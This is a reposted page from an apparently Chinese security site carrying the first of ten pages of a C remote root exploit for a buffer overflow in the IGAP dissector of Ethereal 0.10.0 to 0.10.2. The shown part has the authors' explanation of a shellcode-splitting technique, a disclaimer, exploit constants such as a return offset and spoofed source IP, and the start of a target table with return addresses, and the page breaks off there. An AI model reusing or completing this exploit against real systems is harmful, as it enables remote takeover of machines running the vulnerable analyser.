 |
溢出代码:Ethereal 0.10.0-0.10.2 IGAP Overflow Remote Root Exploit |
|
| 溢出代码:Ethereal 0.10.0-0.10.2 IGAP Overflow Remote Root Exploit |
|
| 作者:未知 文章来源:网络收集 点击数: 更新时间:2006-3-29 15:20:24
|
/*
* THE EYE ON SECURITY RESEARCH GROUP - INDIA
* Ethereal IGAP Dissector Message Overflow Remote Root exploit
*
* Copyright 2004 - EOS-India Group
*
* Authors note:
* Shellcode splitting technique:
* Due to difficulty involved while following normal exploitation techniques due to shortage of memory space
* for our shellcode, we used the technique of shellcode splitting. In this technique one part of the shellcode
* is kept before the buffer which overwrites the saved EIP on stack followed by a jmp OFFSET instruction which
* jumps EIP to the second half of the shellcode which is kept after return address. Also since our shellcode
* requires EBP to contain a usuable stack address, we overwrite saved EBP also.
*
* Disclaimer:
* This code is for educational purpose and testing only. The Eye on Security Research Group - India, cannot
* be held responsible for any damage caused due to misuse of this code.
* This code is a proof of concept exploit for a serious vulnerability that exists in Ethereal 0.10.0 to
* Ethereal 0.10.2.
*
* Nilanjan De [n2n+linuxmail.org] - Abhisek Datta [abhisek+front.ru]
* http://www.eos-india.net
*
*/
#define IPPROTO_IGAP0x02 // IPPROTO_IGMP=0x02
#define PAYLOAD_SIZE(255-64)
#define MAX_BUFFsizeof(struct igap_header)+sizeof(struct ipheader)
#define EXP"Ethereal(v0.10.0-0.10.2) IGAP Dissector Message Overflow Exploit"
#define VER"0.2"
#define SOCKET_ERROR-1
#define MAX_PACKET10
#define RETOFFSET 76
#define SRC_IP"192.31.33.7"
#include <stdio.h>
#include <signal.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <unistd.h>
#include <signal.h>
#include <netdb.h>
#define MAX_ARCH5
struct eos{
char *arch;
unsigned long ret;
} targets[] = {
"tEthereal(0.10.2)-Gentoo(gdb)",
0xbffede50,
//------------------------[1] [2] [3] [4] [5] [6] [7] [8] [9] [10] ... 下一页 >>
|
|
[ 收藏此页到: 天天|和讯|博采|ViVi|狐摘|我摘|天极 ] 文章录入:kinda 责任编辑:kinda |
|
上一篇文章: Hook 系统服务隐藏端口
下一篇文章: 绕过内核调度链表进程检测 |
| 【字体:小 大】【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口】 |
用户登录 
新用户注册 
网友评论:(只显示最新10条。评论内容只代表网友观点,与本站立场无关!)